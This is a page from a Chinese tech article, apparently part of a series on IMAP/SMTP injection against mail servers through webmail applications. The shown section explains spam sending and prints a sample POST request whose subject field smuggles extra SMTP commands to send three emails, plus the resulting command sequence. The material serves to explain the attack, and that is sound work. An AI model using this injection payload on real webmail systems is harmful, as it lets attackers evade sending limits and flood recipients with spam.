科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网服务器频道如何利用注射技术攻击邮件服务器?

如何利用注射技术攻击邮件服务器?

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

本文将详细介绍通过跟邮件服务器通信的Web应用程序,即webmail应用来注入某些邮件协议(IMAP和SMTP协议)命令来攻击邮件服务器的原理、方法和防御措施。

来源:51cto 2009年9月9日

关键字: 邮件服务器 服务器

  • 评论
  • 分享微博
  • 分享邮件

在本页阅读全文(共5页)

(六)垃圾邮件

采用的技术:SMTP注射

用户认证要求:有

这里介绍的情形跟前面的转发攻击一样。因为攻击者的目标是尽量绕开各种限制,例如,一个用户允许发送的电子邮件数量的上限,所以攻击者向有弱点的参数中注入攻击者想要发送的电子邮件数量所需的命令。通过向web服务器发送一个像下面那样的POST请求,攻击者就能完成许多动作。下面举例说明攻击者如何只用一个简单命令来发送三个电子邮件:

POST http:///compose.php HTTP/1.1 

... 

-----------------------------134475172700422922879687252 

Content-Disposition: form-data; name="subject" 

SPAM Example 

. 

MAIL FROM: external@domain1.com 

RCPT TO: external@domain2.com 

DATA 

SPAM test 

. 

MAIL FROM: external@domain1.com 

RCPT TO: external@domain2.com 

DATA 

SPAM test 

. 

MAIL FROM: external@domain1.com 

RCPT TO: external@domain2.com 

DATA 

SPAM test 

. 

-----------------------------134475172700422922879687252 

... 

这将引发下列SMTP命令序列: 

MAIL FROM: 

RCPT TO: 

DATA 

Subject: SPAM Example 

. 

MAIL FROM: external@domain1.com 

RCPT TO: external@domain2.com 

DATA 

SPAM test 

. 

MAIL FROM: external@domain1.com 

RCPT TO: external@domain2.com 

DATA 

SPAM test 

. 

MAIL FROM: external@domain1.com 

RCPT TO: external@domain2.com 

DATA 

PAM test 

. 

... 


    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章